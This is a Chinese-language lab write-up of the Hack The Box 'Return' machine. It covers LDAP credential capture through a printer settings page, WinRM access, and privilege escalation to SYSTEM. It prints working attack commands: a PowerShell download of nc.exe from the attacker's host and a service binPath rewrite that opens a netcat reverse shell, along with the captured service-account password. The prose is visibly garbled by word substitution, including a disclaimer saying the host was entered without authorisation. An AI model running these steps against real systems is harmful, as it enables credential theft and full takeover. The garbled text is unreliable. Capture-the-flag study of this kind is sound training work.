免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务探测
┌──(rootkali)-[~/htb/return]└─# nmap -sV -Pn 10.10.11.108 -p-Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-27 22:40 ESTNmap scan report for 10.10.11.108Host is up (0.34s latency).Not shown: 65508 closed portsPORT STATE SERVICE VERSION53/tcp open domain Simple DNS Plus80/tcp open http Microsoft IIS httpd 10.088/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-11-28 04:22:19Z)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)445/tcp open microsoft-ds?464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open tcpwrapped3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)3269/tcp open tcpwrapped5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)9389/tcp open mc-nmf .NET Message Framing22752/tcp filtered unknown47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)49664/tcp open msrpc Microsoft Windows RPC49665/tcp open msrpc Microsoft Windows RPC49666/tcp open msrpc Microsoft Windows RPC49667/tcp open msrpc Microsoft Windows RPC49671/tcp open msrpc Microsoft Windows RPC49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.049675/tcp open msrpc Microsoft Windows RPC49679/tcp open msrpc Microsoft Windows RPC49682/tcp open msrpc Microsoft Windows RPC49694/tcp open msrpc Microsoft Windows RPC54599/tcp open msrpc Microsoft Windows RPCService Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 1426.09 seconds能够看见开启了很多服务,http,SMB,ldap等
enum4linux没有发现能够匿名登录的分享文件夹
目录爆破没有能够利用的信息
流动目录
浏览器关上80端口服务,首页是一个打印机的展现页面
关上settings页面,展现了一个打印机的设置页。
咱们用以下关键字
ldap windows printer 389 exploit
在谷歌找到了这篇文章
注意这段话:
To exploit this weakness, we simply need to reconfigure the MFP to use a different IP address for the LDAP server. Obviously, the selected IP address needs to be under our control and listening on port 389 (unsecured LDAP). When the MFP eventually makes an LDAP query, it should transmit the credentials back to us in plaintext.
当把Server Address字段换成一个咱们能够管制的机器,ldap服务就会以明文返回一个治理明码
咱们在settings页面,把Server Address改成10.10.14.15(就是tun0的地址)
同时,在咱们的kali开启一个389端口的监听
点击update
收到ldap给咱们的返回:
┌──(rootkali)-[~/htb/return]└─# nc -lnvp 389 listening on [any] 389 ...connect to [10.10.14.15] from (UNKNOWN) [10.10.11.108] 633370*`%return\svc-printer� 1edFg43012!!svc-printer是账户信息
1edFg43012!!就是治理明码
用evil-winrm连贯,拿到初始shell
┌──(rootkali)-[~/htb/return]└─# evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!' 1 ⨯Evil-WinRM shell v3.2Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machineData: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completionInfo: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoamireturn\svc-printer提权
查看本账号权限:
*Evil-WinRM* PS C:\Users\svc-printer\desktop> whoami /privPRIVILEGES INFORMATION----------------------Privilege Name Description State============================= =================================== =======SeMachineAccountPrivilege Add workstations to domain EnabledSeLoadDriverPrivilege Load and unload device drivers EnabledSeSystemtimePrivilege Change the system time EnabledSeBackupPrivilege Back up files and directories EnabledSeRestorePrivilege Restore files and directories EnabledSeShutdownPrivilege Shut down the system EnabledSeChangeNotifyPrivilege Bypass traverse checking EnabledSeRemoteShutdownPrivilege Force shutdown from a remote system EnabledSeIncreaseWorkingSetPrivilege Increase a process working set EnabledSeTimeZonePrivilege Change the time zone Enabled查看本账号信息:
*Evil-WinRM* PS C:\Users\svc-printer\desktop> net user svc-printerUser name svc-printerFull Name SVCPrinterComment Service Account for PrinterUser's commentCountry/region code 000 (System Default)Account active YesAccount expires NeverPassword last set 5/26/2021 12:15:13 AMPassword expires NeverPassword changeable 5/27/2021 12:15:13 AMPassword required YesUser may change password YesWorkstations allowed AllLogon scriptUser profileHome directoryLast logon 11/30/2021 8:10:04 AMLogon hours allowed AllLocal Group Memberships *Print Operators *Remote Management Use *Server OperatorsGlobal Group memberships *Domain UsersThe command completed successfully.注意咱们在Server Operators组中,因而 咱们领有批改服务配置,重启服务的权限
把nc从kali下载到靶机:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.15:8000/nc.exe','C:\Users\svc-printer\desktop\nc.exe')"
批改vss服务的二进制文件门路
sc.exe config vss binPath="C:\Users\svc-printer\desktop\nc.exe -e cmd.exe 10.10.14.15 4242"
与此同时在kali开启监听端口4242
nc -lnvp 4242
重启vss服务
*Evil-WinRM* PS C:\Users\svc-printer\desktop> sc.exe stop vss[SC] ControlService FAILED 1062:The service has not been started.*Evil-WinRM* PS C:\Users\svc-printer\desktop> sc.exe start vss[SC] StartService FAILED 1053:The service did not respond to the start or control request in a timely fashion.拿到system的反弹shell
┌──(rootkali)-[~/htb/return]└─# nc -lvnp 4242 1 ⨯listening on [any] 4242 ...connect to [10.10.14.15] from (UNKNOWN) [10.10.11.108] 61869Microsoft Windows [Version 10.0.17763.107](c) 2018 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoamiwhoamint authority\system